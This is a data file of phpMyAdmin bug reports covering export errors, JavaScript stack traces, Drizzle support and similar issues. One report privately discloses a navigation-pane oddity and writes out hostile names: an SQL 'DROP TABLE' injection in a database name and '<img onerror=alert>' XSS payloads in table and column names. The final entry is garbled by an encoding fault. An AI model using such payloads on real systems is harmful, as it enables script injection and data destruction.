Original URL https sourceforge.net p phpmyadmin bugs 4931 Original author azurit Found in version 4.4.8","bug"
"24444","11275","Drizzle version numbers.
In `libraries Types.class.php` line 1027 > if PMA MYSQL INT VERSION >= 20120130) should be fixed, because Drizzle uses more standard version numbers now, such as 7.1.
The wiki also needs to be updated https wiki.phpmyadmin.net pma Drizzle for developers PMA MYSQL INT VERSION See https github.com phpmyadmin phpmyadmin blob 3ada00030f7b1f045422a4e80a1fd84ea5c42728 libraries Types.class.php L1027 and d3b1b9f9a2776748dbfe0dd57c77e5ee1b0455fc Support for Drizzle IPV6 column type in Fremont Added SCHEMA function synonym for DATABASE) Original URL https sourceforge.net p phpmyadmin bugs 4932 Original author ibennetch Found in version 4.4.8","bug"
"24444","11276","INSERT validation issues with MySQL functions.
Sometimes a MySQL function can take in data that isn t of the type the column is, for instance with INET ATON 127.0.0.1).
This function is designed to insert to an unsigned INT column, but the validation feature sees 127.0.0.1 and feels it s not valid to insert and gives me the Please enter a valid number error message.
Original URL https sourceforge.net p phpmyadmin bugs 4933 Original author ibennetch Found in version Latest Git","bug"
"24444","11277","Shift click function doesn t seem to apply to all rows.
When in the Insert tab, the tool tip on the MySQL function dropdown says Shift CLick on function name to apply to all rows but I have tried with Firefox and Chrome and can t get it to apply to all rows.
Original URL https sourceforge.net p phpmyadmin bugs 4934 Original author ibennetch Found in version 4.4.8","bug"
"24444","11278","Custom export with backquotes off is not working.
Here are my pma stats Apache 2.4.7 Ubuntu) Database client version libmysql 5.5.43 PHP extension mysqli Documentation PHP version 5.5.9 1ubuntu4.9 Version information 4.4.8 up to date) Git revision db53824 from STABLE branch, committed on May 28, 2015 at 03 36 AM by Marc Delisle When doing database exports, with Use backquotes off.
It is not backquoting some reserved words.
To recreate, use this database schema CREATE TABLE IF NOT EXISTS `order` id int 11) NOT NULL, blah text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; CREATE TABLE IF NOT EXISTS othertable id int 11) NOT NULL, id fk int 11) NOT NULL, blah int 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; ALTER TABLE `order` ADD PRIMARY KEY id); ALTER TABLE othertable ADD PRIMARY KEY id), ADD KEY id fk id fk); ALTER TABLE `order` MODIFY id int 11) NOT NULL AUTO INCREMENT; ALTER TABLE othertable MODIFY id int 11) NOT NULL AUTO INCREMENT; ALTER TABLE othertable ADD CONSTRAINT othertable ibfk 1 FOREIGN KEY id fk) REFERENCES `order` id); Do a custom database export and change these options from default Set to False Enclose table and column names with backquotes When you look at the export it will show this ALTER TABLE othertable ADD CONSTRAINT othertable ibfk 1 FOREIGN KEY id fk) REFERENCES order id); Which is not valid SQL.
This is a regression of a bug that was already fixed.
4663 Original URL https sourceforge.net p phpmyadmin bugs 4937 Original author bskrtich Found in version 4.4.8","bug"
"24444","11279","On print, Indexes link and .sticky columns remain visible.
Two minor issues I noticed 1. on printing Table=>Structure page, even when indexes slider is collapsed, the anchor link Indexes) remains visible in the print giving an impression that something is missing or whats follows is related to Indexes and not Information .
2. on printing Table=>Browse page, the separate .sticky columns header remained visible overlying on the print, when attempting to print the same page more than once in Chromium 37.0.2062.120 Built on Ubuntu 12.04).
Original URL https sourceforge.net p phpmyadmin bugs 4938 Original author atul5 Found in version Latest Git","bug"
"24444","11280","Connection input field not hidden when adding a new table.
Original URL https sourceforge.net p phpmyadmin bugs 4939 Original author madhuracj Found in version Latest Git","bug"
"24444","11281","Notices in GIS visualization page.
Original URL https sourceforge.net p phpmyadmin bugs 4940 Original author madhuracj Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4940 attachment notice.png","bug"
"24444","11282","Table structure multi submit is broken.
Multi submits such as Edit, Delete on table structure page is broken Original URL https sourceforge.net p phpmyadmin bugs 4941 Original author madhuracj Found in version Latest Git","bug"
"24444","11283","Export to gzip saves plain text under Chrome.
Steps to recreate go to any database click Export tab select Custom select gzipped from Compression press Go Under Chrome 43.0.2357.81 m the file is saved as plain text, wrong Firefox 38.0.5 the file is saved az gzipped data, properly Opera 29.0.1795.60 the same as Firefox OS Win7 Pro SP1 Original URL https sourceforge.net p phpmyadmin bugs 4942 Original author fireba11 Found in version 4.4.8","bug"
"24444","11284","Relation view broken in master.
In relation view, interval relations, the drop down for columns is no longer there.
The first bad commit is https github.com phpmyadmin phpmyadmin commit 79319a60fcf3cae9eafdcc34b36cc1ef50772c7d Original URL https sourceforge.net p phpmyadmin bugs 4943 Original author lem9 Found in version Latest Git","bug"
"24444","11285","Fatal error Cannot redeclare class Application Octetstream Download.
Hi All, I have this error when I try doing many action like create a new table in a schema edit table structure Fatal error Cannot redeclare class Application Octetstream Download in [phpMyAdmin ROOT]\libraries\plugins\transformations\Application Octetstream Download.class.php on line 42 Original URL https sourceforge.net p phpmyadmin bugs 4944 Original author masterayntic Found in version 4.4.9 Attachment http sourceforge.net p phpmyadmin bugs 4944 attachment img1.png Attachment http sourceforge.net p phpmyadmin bugs 4944 attachment img2.png","bug"
"24444","11286","test ticket error reporting server.
testing ers!
pls ignore.
This report is related to user submitted report [ 37] http localhost 8080 error reporting server reports view 37) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4945 Original author smita786 Found in version 4.1.0","bug"
"24444","11287","When hide table structure actions is false, action should be in a row.
Original URL https sourceforge.net p phpmyadmin bugs 4946 Original author madhuracj Found in version 4.4.9 Attachment http sourceforge.net p phpmyadmin bugs 4946 attachment actions.png","bug"
"24444","11288","Editing a view gives errors.
Original URL https sourceforge.net p phpmyadmin bugs 4947 Original author madhuracj Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4947 attachment errors.png","bug"
"24444","11289","explain is broken in latest version.
Can not do explain on the server since a couple days ago.
It just outputs how many rows have changed like it was doing an update statement.
Currently using 4.5 dev though packagist http i.imgur.com VcW4wvN.png Original URL https sourceforge.net p phpmyadmin bugs 4948 Original author dogmatic6969 Found in version Latest Git","bug"
"24444","11290","Issues in database selection for replication.
1.
Uncheck all link does not update the database list indicated below it.
2.
It would be better to have a Check all link also Original URL https sourceforge.net p phpmyadmin bugs 4950 Original author madhuracj Found in version 4.4.9","bug"
"24444","11291","gzopen function when import gzip file.
I found an issue when import gzip file.
This problem seems because gzopen function is not available.
On my laptop using gzopen64 insteal gzopen function.
Please check in import.php at line 484 Thank you !
Original URL https sourceforge.net p phpmyadmin bugs 4952 Original author tdchien Found in version 4.3.7","bug"
"24444","11292","cant drag sql.gz file onto import input.
A few updates back some js was added to do drag drop file uploads.
Works fine for sql files.
does not work for sql.gz Before any file could be dropped onto the input this is default behaviour for chrome browser).
now I have to click choose file and then find it which is a pain.
http i.imgur.com UrYIF20.png Original URL https sourceforge.net p phpmyadmin bugs 4953 Original author dogmatic6969 Found in version 4.4.9","bug"
"24444","11293","Warnings on query results refresh.
Using sakila sample database execute SELECT `actor`.`actor id` AS `asd` FROM `actor` ORDER BY `actor`.`actor id` ASC and press refresh Original URL https sourceforge.net p phpmyadmin bugs 4954 Original author madhuracj Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4954 attachment error.png","bug"
"24444","11294","Clicking on the navi logo does not always work.
It s difficult to give a scenario, but sometimes, the target of the phpMyAdmin logo in the navi panel is no longer the home page.
Original URL https sourceforge.net p phpmyadmin bugs 4955 Original author lem9 Found in version 4.4.9","bug"
"24444","11295","Trying to build query in visual builder throws JS error.
Original URL https sourceforge.net p phpmyadmin bugs 4956 Original author madhuracj Found in version Latest Git","bug"
"24444","11296","With selected links doesn t work in table browse.
With selected links doesn t work in table browse.
Additionally, it gives some JS error.
In QA 4 4, it works, but also gives the same similar JS error.
Original URL https sourceforge.net p phpmyadmin bugs 4957 Original author nisargjhaveri Found in version 4.4.0","bug"
"24444","11297","Navigation pane mouseover oddity with specially crafted database table names.
Leaving this as private for now because I m not sure whether it s an actual vulnerability.
I very much think it is not, but want to be safe and responsible.
This also appears to be low priority as it seems to simply be a display issue.
First, create the database and table CREATE DATABASE IF NOT EXISTS `x ; DROP TABLE members; ` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; USE `x ; DROP TABLE members; `; CREATE TABLE IF NOT EXISTS ` <img src=x onerror=alert 1)> ` ` <img src=x onerror=alert 2)> ` int 11) NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=latin1; Now, go to the Navigation Pane and hover over the newly created database, table, and column names.
The hover text appears to be a link the tool tip Structure or Browse appears as is normal after a moment or two, just like every other situation).
Clicking the link text doesn t do anything special; the Browse Structure default action is preserved.
This appears to be a very minor display issue rather than any major flaw.
Original URL https sourceforge.net p phpmyadmin bugs 4959 Original author ibennetch Found in version 4.4.9","bug"
"24444","11298","Table creation results in GET request with missing server parameter that invalidates the session.
phpMyAdmin 4.4.9 MySQL 5.5.3 Browser Chromium 43.0.2357.124 64 bit) After creating a new table, there seems to be a GET request started that has the server variable missing and invalidates the session.
The next request has a new token which results in the GUI displaying something like token missmatch and redirecting the user to the login page.
request trace POST tbl structure.php POST tbl create.php GET db structure.php?server=40 token=<TOKEN A> server=40 db=<DB NAME> table=test5 ajax request=true ajax page request=true menuHashes=<MENU HASHES> nocache=1434367506209123225 POST navigation.php?ajax request=1 server=40 token=<TOKEN A> GET tbl structure.php?db=<DB NAME> token=<TOKEN A> goto=db structure.php table=test5 ajax request=true ajax page request=true menuHashes=<MENU HASHES> nocache=1434367506211781181 GET index.php?ajax request=1 recent table=1 server=40 token=<TOKEN A> GET index.php?ajax request=1 recent table=1 token=<TOKEN B> ... the request to tbl structure.php is missing the server variable.
The request seems to be initiated in js functions.js 2706 javascript Redirect to table structure page on creation of new table var params 12 = ajax request=true ajax page request=true ; params 12 = AJAX.cache.menus.getRequestParam ); tblStruct url = tbl structure.php?db= data.
params.db token= data.
params.token goto=db structure.php table= data.
params.table ; .get tblStruct url, params 12, AJAX.responseHandler); I guess that this is making the problem, but unfortunately I am not able to reproduce the error on our test system.
I was just fiddling with our live system and hoping on input from your side.
More proof On our live system the following request is definitely invalidating the session resulting in invalid token errors if trying to reload ajax naviation in another tab) tbl structure.php?db=<DB> token=<TOKEN> in contrast to the following which is working just fine tbl structure.php?server=<SERVER> db=<DB> token=<TOKEN> I have also attached our skeleton config.inc.php we re using cookie auth) Original URL https sourceforge.net p phpmyadmin bugs 4960 Original author martinherndl Found in version 4.4.9 Attachment http sourceforge.net p phpmyadmin bugs 4960 attachment config.inc.php","bug"
"24444","11299","Javascript error when Designer is opened.
Opening designer causes javascript error.
I just opens phpmyadmin, select database and click on Designer same on 4.5.0dev), error appears directly.
I m unable to do anything on page, send Error report too, so I m including error report here Report data { pma version 4.4.9 , browser name CHROME , browser version 43.0.2357.124 , user os Win , server software Apache 2.4.7 Win32) PHP 5.6.4 , user agent string Mozilla 5.0 Windows NT 10.0; Win64; x64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.124 Safari 537.36 , locale cs , configuration storage enabled , php version 5.6.4 , exception type js , exception { mode stack , name TypeError , message Cannot read property offsetTop of null , stack [ { line 235, func , context [ lastException = null; , notifyHandlers.apply null, [stack, null].concat args)); , } , }, stack.incomplete ?
2000 0)); , , throw ex; re throw to propagate to the top level and cause wind ... , } , , report.subscribe = subscribe; , report.unsubscribe = unsubscribe; , return report; ], column , filename tracekit tracekit.js }, { func Re load , line 361, column 84 , context [ alert document.getElementById id hide tbody key2)); , var tab hide button = document.getElementById id hide ... , , alert tab hide button.innerHTML); , if tab hide button.innerHTML == v ) { , row offset top = document.getElementById key2 \ .\ ... , } , , var y1 = document.getElementById key2).offsetTop , row offset top , height field; ], filename pmd move.js }, { func Main , line 259, column 5 , context [ sm x = document.getElementById osn tab ).offsetLeft; , sm y = document.getElementById osn tab ).offsetTop; , Osn tab pos ); , Canvas pos ); , Small tab refresh ); , Re load ); , id hint = document.getElementById pmd hint ); , if isIE) { , General scroll ); , } , } ], filename pmd move.js }, { func HTMLDocument.
lt;anonymous gt; , line 31, column 5 , context [ db = \ script db\ ).html ); , token = \ script token\ ).html ); , selected page = \ script display page\ ).html ) === \ \ ?
\ 1\ ... , pmd tables enabled = \ pmd tables enabled\ ).html ) === \ 1\ ; , , Main ); , , if !
pmd tables enabled) { , DesignerOfflineDB.open function success) { , if success) { , Show tables in landing page db); ], filename pmd init.js }, { func HTMLDocument.new func , line 279, column 33 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func HTMLDocument.m.event.dispatch , line 3, column 8436 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module amp; amp;\ object\ ==typeof module.exports?mod ... , if k amp; amp;j[k] amp; amp; e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a amp; amp;a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.
event.dispatch , line 374, column 19 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) gt; 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func HTMLDocument.r.handle , line 3, column 5146 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module amp; amp;\ object\ ==typeof module.exports?mod ... , if k amp; amp;j[k] amp; amp; e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a amp; amp;a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Object.m.event.trigger , line 3, column 7537 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module amp; amp;\ object\ ==typeof module.exports?mod ... , if k amp; amp;j[k] amp; amp; e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a amp; amp;a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.
lt;anonymous gt; , line 3, column 15404 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module amp; amp;\ object\ ==typeof module.exports?mod ... , if k amp; amp;j[k] amp; amp; e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a amp; amp;a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Function.m.extend.each , line 2, column 2973 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module amp; amp;\ object\ ==typeof module.exports?mod ... , if k amp; amp;j[k] amp; amp; e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a amp; amp;a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js } ], useragent Mozilla 5.0 Windows NT 10.0; Win64; x64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.124 Safari 537.36 , incomplete false , partial true , uri db designer.php?target= }, script name db designer.php , microhistory { pages [ { hash index.php?db= amp;table= amp;server=1 amp;target= amp;token=440b0d17b964e254a7609120a0f0f0e3 }, { hash server variables.php?db= amp;table= amp;server=1 amp;target= amp;token=440b0d17b964e254a7609120a0f0f0e3 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang cs , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Proj\u00edt , pma text left default tab Struktura , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash db structure.php?db=a93002 podstr amp;table= amp;server=1 amp;target= amp;token=440b0d17b964e254a7609120a0f0f0e3 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang cs , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Proj\u00edt , pma text left default tab Struktura , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash db designer.php?db=a93002 podstr amp;table= amp;server=1 amp;target= amp;token=440b0d17b964e254a7609120a0f0f0e3 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang cs , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Proj\u00edt , pma text left default tab Struktura , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } } ], current index 4 } } Original URL https sourceforge.net p phpmyadmin bugs 4961 Original author lucius silencio Found in version 4.4.9 Attachment http sourceforge.net p phpmyadmin bugs 4961 attachment phpmyadminerror.png","bug"
"24444","11300","Javascript error with ENUM on Insert tab.
Since `84fa181135a83dd0b75b44f80edc69a5311fbb0c` I have a problem when on the Insert tab; clicking an ENUM column gives a JavaScript error.
<pre> { pma version 4.5.0 dev , browser name CHROME , browser version 43.0.2357.124 , user os Mac , server software Apache 2.2.22 Debian) , user agent string Mozilla 5.0 Macintosh; Intel Mac OS X 10 10 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.124 Safari 537.36 , locale en , configuration storage enabled , php version 5.4.41 0 deb7u1 , exception type js , exception { mode onerror , message Uncaught TypeError Cannot read property length of undefined , stack [ { line 222, func ?
, context [ charExceptionHandling = theType.substring 5,6); , } , else if theType.substring 0,7) === \ varchar\ ) { , charExceptionHandling = theType.substring 8,9); , } , if this function.val ).length > 0) { , this input.removeAttr min ); , this input.removeAttr max ); , todo put back attributes if corresponding function is deselected , } , ], filename tbl change.js } ], useragent Mozilla 5.0 Macintosh; Intel Mac OS X 10 10 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 43.0.2357.124 Safari 537.36 , name TypeError , uri tbl change.php?target= }, script name tbl change.php , microhistory { pages [ { hash tbl change.php?db=baseball mark tracker table=games server=1 target= token=4ead1456e2f8cc650c2afe37a03dd368 } ], current index 1 } } < pre> Original URL https sourceforge.net p phpmyadmin bugs 4965 Original author ibennetch Found in version Latest Git","bug"
"24444","11301","MySQL constraint violation errors are not shown when DebugSQL is on.
Go to sakila db strcuture) and try deleting film table with foreign key constraints enabled.
Table should not be deleted since foreign key constraints prevent that from happening.
However, row corresponding to film table is removed and upon refreshing appears again.
Original URL https sourceforge.net p phpmyadmin bugs 4966 Original author madhuracj Found in version 4.4.10","bug"
"24444","11302","Autoload from prefs storage not behaving properly.
Hi, The preferences can be stored in browser s localstorage.
Now, if I logout and re login.
There is a notice div id= prefs autoload ) saying Your browser has phpMyAdmin configuration for this domain.
Would you like to import it for current session?
.
till this, it behaves as expected) But when I click Yes , there is a Javascript Error Invalid JSON!Unexpected token < and Uncaught TypeError Cannot read property status of null .
The error report is just for reference) { pma version 4.4.7 , browser name CHROME , browser version 37.0.2062.120 , user os Linux , server software nginx 1.6.2 , user agent string Mozilla 5.0 X11; Linux x86 64) AppleWebKit 537.36 KHTML, like Gecko) Ubuntu Chromium 37.0.2062.120 Chrome 37.0.2062.120 Safari 537.36 , locale en , configuration storage enabled , php version 5.6.9 0 deb8u1 , exception type js , exception { mode stack , name TypeError , message Cannot read property status of null , stack [ { line 232, func , context [ lastException = null; , notifyHandlers.apply null, [stack, null].concat args)); , } , }, stack.incomplete ?
2000 0)); , , throw ex; re throw to propagate to the top level and cause wind ... , } , , report.subscribe = subscribe; , report.unsubscribe = unsubscribe; , return report; ], column , filename tracekit tracekit.js }, { func HTMLDocument.<anonymous> , line 173, column 32 , context [ try { , var data = .parseJSON xhr.responseText); , PMA console.ajaxCallback data); , } catch e) { , console.log \ Invalid JSON!\ e.message); , if AJAX.xhr.status === 0 AJAX.xhr.statusText !== ab ... , PMA ajaxShowMessage <div > ,{class error ,html ... , AJAX.active = false; , AJAX.xhr = null; , } , } ], filename console.js }, { func HTMLDocument.new func , line 276, column 33 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func HTMLDocument.m.event.dispatch , line 3, column 8436 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.
event.dispatch , line 373, column 19 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) > 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func HTMLDocument.r.handle , line 3, column 5146 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Object.m.event.trigger , line 3, column 7537 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func x , line 4, column 21995 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , , Copyright c) 2013 Kevin van Zonneveld http kvz.io) ], filename jquery jquery 1.11.1.min.js }, { func XMLHttpRequest.b , line 4, column 25897 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , , Copyright c) 2013 Kevin van Zonneveld http kvz.io) ], filename jquery jquery 1.11.1.min.js } ], useragent Mozilla 5.0 X11; Linux x86 64) AppleWebKit 537.36 KHTML, like Gecko) Ubuntu Chromium 37.0.2062.120 Chrome 37.0.2062.120 Safari 537.36 , incomplete false , partial true , uri index.php?target= }, script name index.php , microhistory { pages [ { hash index.php?db= table= server=2 target= token=3a15a33d49f2e78dc62435bff7a485fe } ], current index 1 } } Original URL https sourceforge.net p phpmyadmin bugs 4969 Original author deven bansod Found in version 4.4.7","bug"
"24444","11303","Subqueries Cause PHP Error on Refresh.
Run the query select select 1), select 2) from the SQL page, then hit Refresh to run again.
You get the error below Notice in .
libraries sqlparser.lib.php 2477 Undefined offset 1 Original URL https sourceforge.net p phpmyadmin bugs 4970 Original author saygin76 Found in version 4.4.10","bug"
"24444","11304","test ticket error reporting server cake3.0.
ignore pls!
This report is related to user submitted report [ 37] http localhost 8080 error reporting server reports view 37) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4971 Original author smita786 Found in version 4.1.0","bug"
"24444","11305","Incorrect length computed for binary data.
I have table with LONGBLOB column type.
When inserting 8192 bytes of binary data though phpMyAdmin or with own PHP script doesn t matter) phpMyAdmin shows that there are one 6.7 KiB of binary data which is wrong), downloading binary data results in file of size 6855 bytes, which is less than 8192 bytes, obviously.
Inserting binary data with size 34152 bytes results in 33738 bytes.
I ve tried to fetch data with simple PHP script directly and got all 8192 bytes without any truncation, so, this is bug in phpMyAdmin itself.
Ubuntu 15.10 x64 MariaDB 10.0.19 phpMyAdmin 4.4.9deb1 Ubuntu package) PHP 5.6.4 4ubuntu6 Ubuntu package) Sample of binary data attached.
Original URL https sourceforge.net p phpmyadmin bugs 4972 Original author nazar pc Found in version 4.4.10 Attachment http sourceforge.net p phpmyadmin bugs 4972 attachment test","bug"
"24444","11306","Creating a database from console doesn t update database list on the left.
When I create a database using console, required database is created but the database list on the left doesn t get updated.
Only refreshing phpMyAdmin updates the list.
But if I create a database using the database creation form, it automatically updates the database list.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4974 Original author shakil1 Found in version 4.4.10","bug"
"24444","11307","Move Copy Rename operations on Table Db fail on Drizzle server.
Hi, The operations like Move , Copy , Rename etc.
on Table and Database fail on a Drizzle server.
The reason is we run a query SET SQL MODE = NO AUTO VALUE ON ZERO while performing these operations.
But, SQL MODE variable is not present in Drizzle.
They have implicitly assumed it set by default as per discussion here https lists.launchpad.net drizzle discuss msg04101.html https bugs.launchpad.net drizzle bug 314567 Original URL https sourceforge.net p phpmyadmin bugs 4975 Original author deven bansod Found in version 4.4.10","bug"
"24444","11308","Timepicker CSS issues in Original theme.
Original URL https sourceforge.net p phpmyadmin bugs 4976 Original author madhuracj Found in version 4.4.11 Attachment http sourceforge.net p phpmyadmin bugs 4976 attachment calendar.png","bug"
"24444","11309","Get the latest english only realses s URL.
Up to now it was possible to parse SF s RSS feed and get the latest english ZIP.
Could you please advise how to get that URL now?
Original URL https sourceforge.net p phpmyadmin bugs 4977 Original author szepeviktor Found in version 4.4.11","bug"
"24444","11310","Cancelled page settings changes do not restore the settings UI.
In the page settings dialog change some option and then cancel without submitting.
When you reopen page settings this setting is incorrectly marked as changed.
Original URL https sourceforge.net p phpmyadmin bugs 4978 Original author madhuracj Found in version Latest Git","bug"
"24444","11311","Problem when import .ods file.
I ve create a database on excel and saved him as Open document spreadsheet, but when i try to import him, i browse and select file, select The first line contain the column name option and press the continue button, i have an error message saying MySQL 1117 Too many columns and display the query showing the column names of my table, and include the column names of the excel sheet idpatient int 1), name varchar 10), lastname varchar 10), phone int 10), adress varchar 10), ....... , L varchar 10), M varchar 10), N varchar 10), O varchar 10) idpatient , name , lastname , phone , adress are column names of my table The L , M , N , O , are excel column names Original URL https sourceforge.net p phpmyadmin bugs 4979 Original author choryjm Found in version 4.4.11","bug"
"24444","11312","Uncaught TypeError Cannot read property attr of null.
This report is related to user submitted report [ 11919] https reports.phpmyadmin.net reports view 11919) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4981 Original author phpmyadmin bot Found in version 4.4.11","bug"
"24444","11313","Theme configurations not defined.
This report is related to user submitted report [ 11922] https reports.phpmyadmin.net reports view 11922) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4982 Original author phpmyadmin bot Found in version 4.4.11","bug"
"24444","11314","Undefined <feature>work upon upgrade to new version.
This report is related to user submitted report [ 11887] https reports.phpmyadmin.net reports view 11887) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4984 Original author phpmyadmin bot Found in version 4.4.11","bug"
"24444","11315","Column headers move when scrolling.
Hi, I reported this bug a long time ago and it got fixed but it seems to have come back again.
When you have a lot of results and start scrolling downwards through the results in PMA 4.4.11 the column headers shift out of position.
I have included two images, one showing the columns in the right location BEFORE scrolling, another showing the positions after scrolling.
The after position can cause an end user confusion if they don t realise the column headers have moved.
Please fix!
Original URL https sourceforge.net p phpmyadmin bugs 4985 Original author deanresource Found in version 4.4.11 Attachment http sourceforge.net p phpmyadmin bugs 4985 attachment notscrolled.JPG Attachment http sourceforge.net p phpmyadmin bugs 4985 attachment scrolled.JPG","bug"
"24444","11316","First stack trace item missing in PHP error reports.
Due to this there is no stack trace in https reports.phpmyadmin.net reports view 12146 Original URL https sourceforge.net p phpmyadmin bugs 4986 Original author madhuracj Found in version 4.4.11","bug"
"24444","11317","parser bug?.
Chyba Je moxc2x9enxc3xa9, xc2x9ee jste naxc2x9ali chybu v SQL parseru.
Prosxc3xadm prozkoumejte podrobn amp; 283; SQL dotaz, p amp; 345;edevxc2x9axc3xadm jestli jsou sprxc3xa1vn amp; 283; uvozovky a jestli nejsou prohxc3xa1zenxc3xa9.
Dalxc2x9axc3xad moxc2x9enost selhxc3xa1nxc3xad je pokud nahrxc3xa1vxc3xa1te soubor s binxc3xa1rnxc3xadmi daty nezapsanxc3xbdmi v uvozovkxc3xa1ch.
M amp; 367;xc2x9eete takxc3xa9 vyzkouxc2x9aet p amp; 345;xc3xadkazovou amp; 345;xc3xa1dku MySQL.
Nxc3xadxc2x9ee uvedenxc3xbd vxc3xbdstup z MySQL serveru pokud je n amp; 283;jakxc3xbd) Vxc3xa1m takxc3xa9 m amp; 367;xc2x9ee pomoci p amp; 345;i zkoumxc3xa1nxc3xad problxc3xa9mu.
